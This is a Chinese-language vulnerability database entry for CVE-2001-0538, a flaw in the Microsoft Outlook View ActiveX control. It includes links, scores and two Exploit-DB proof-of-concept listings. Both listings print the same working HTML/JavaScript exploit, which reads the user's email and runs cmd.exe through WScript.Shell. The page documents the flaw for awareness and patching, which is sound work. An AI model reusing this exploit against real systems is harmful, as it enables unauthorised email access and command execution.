CVE-2001-0538
CVSS10.0
发布时间 :2001-08-14 00:00:00
修订时间 :2016-10-17 22:11:25
NMCOE    

[原文]Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page.


[CNNVD]Microsoft Outlook未认证电子邮件访问漏洞(CNNVD-200108-053)

        Microsoft Outlook 2002版本及之前版本中的Microsoft Outlook View ActiveX Control存在漏洞。远程攻击者可以借助畸形HTML电子邮件消息或网页执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0538
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0538
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-053
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99496431214078&w=2
(UNKNOWN)  BUGTRAQ  20010712 MS Office XP - the more money I give to Microsoft, the more vulnerable my Windows computers are
http://www.ciac.org/ciac/bulletins/l-113.shtml
(UNKNOWN)  CIAC  L-113
http://www.kb.cert.org/vuls/id/131569
(UNKNOWN)  CERT-VN  VU#131569
http://www.microsoft.com/technet/security/bulletin/MS01-038.asp
(VENDOR_ADVISORY)  MS  MS01-038
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0107&L=ntbugtraq&F=P&S=&P=862
(UNKNOWN)  NTBUGTRAQ  20010712 Vulnerability in IE/Outlook ActiveX control
http://www.securityfocus.com/bid/3025
(UNKNOWN)  BID  3025
http://xforce.iss.net/static/6831.php
(UNKNOWN)  XF  outlook-activex-view-control(6831)

- 漏洞信息

Microsoft Outlook未认证电子邮件访问漏洞
危急 访问验证错误
2001-08-14 00:00:00 2005-05-02 00:00:00
远程  
        Microsoft Outlook 2002版本及之前版本中的Microsoft Outlook View ActiveX Control存在漏洞。远程攻击者可以借助畸形HTML电子邮件消息或网页执行任意命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (21003)

Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability (EDBID:21003)
windows remote
2001-07-12 Verified
0 Georgi Guninski
N/A [点击下载]
source: http://www.securityfocus.com/bid/3025/info

Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can access and perform operations on user email through this control without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>		

- 漏洞信息 (21004)

Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability (EDBID:21004)
windows remote
2001-07-12 Verified
0 Georgi Guninski
N/A [点击下载]
source: http://www.securityfocus.com/bid/3026/info

Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can execute commands without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>		

- 漏洞信息

1902
Microsoft Outlook View ActiveX Arbitrary Command Execution
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-07-12 Unknow
2001-07-12 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站